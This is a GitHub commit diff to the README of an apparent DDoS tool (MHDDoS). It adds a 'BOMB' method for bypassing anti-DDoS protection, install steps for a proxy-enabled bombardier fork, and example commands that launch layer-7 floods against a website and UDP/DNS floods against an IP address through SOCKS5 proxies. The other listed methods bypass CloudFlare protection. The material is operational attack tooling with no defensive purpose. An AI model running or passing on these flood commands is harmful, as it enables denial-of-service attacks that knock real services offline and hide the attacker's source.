Update README.md

This commit is contained in:
PXEiYyMH8F 2022-03-05 17:37:42 +00:00 committed by GitHub
parent 121dd4f6c0
commit 469ade87ab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -39,6 +39,7 @@
* <img src="https://techcrunch.com/wp-content/uploads/2019/06/J2LlHqT3qJl0bG9Alpgc-1-730x438.png?w=730" width="16" height="16" alt="CloudFlare"> CFB | CloudFlare Bypass
* <img src="https://techcrunch.com/wp-content/uploads/2019/06/J2LlHqT3qJl0bG9Alpgc-1-730x438.png?w=730" width="16" height="16" alt="CloudFlare UnderAttack Mode"> CFBUAM | CloudFlare Under Attack Mode Bypass
* <img src="http://iclouddnsbypass.com/wp-content/uploads/2015/02/iCloudDNSBypassServer.ico" width="16" height="16" alt="bypass"> BYPASS | Bypass Normal AntiDDoS
* <img src="https://cdn-icons-png.flaticon.com/512/905/905568.png" width="16" height="16" alt="bypass"> BOMB | Bypass with codesenberg/bombardier
* 🧨 Layer4:
@ -92,6 +93,20 @@ You can download it from [GitHub Releases](https://github.com/MHProDev/MHDDoS/re
* [dnspython](https://github.com/rthalley/dnspython)
* [yarl](https://github.com/aio-libs/yarl)
---
Optional
* [bombardier with proxy](github.com/mariotrucco/bombardier@78-add-proxy-support)
**Bombardier with proxy installation**
```shell script
mkdir bombardier_tmp
cd bombardier_tmp
go mod init bombardier_tmp
go mod edit -replace github.com/codesenberg/bombardier=github.com/mariotrucco/bombardier@78-add-proxy-support
go get github.com/codesenberg/bombardier
cd ..
rm -r bombardier_tmp
```
**Videos**
@ -125,12 +140,13 @@ pip3 install -r requirements.txt
* Layer7 (Website):
```console
python3 start.py bypass https://example.com 5 1000 socks5.txt 100 100
python3 start.py bomb https://example.com 5 50 socks5.txt 100 100
```
* Layer4 (Server/Home):
```console
python3 start.py udp 1.1.1.1:53 1 100
python3 start.py dns 1.1.1.1:53 1 100 dns.txt
python3 start.py udp 1.1.1.1:53 1 100 socks5.txt 5
python3 start.py dns 1.1.1.1:53 1 100 socks5.txt 5 dns.txt
```
* Debug Mode (L4/L7):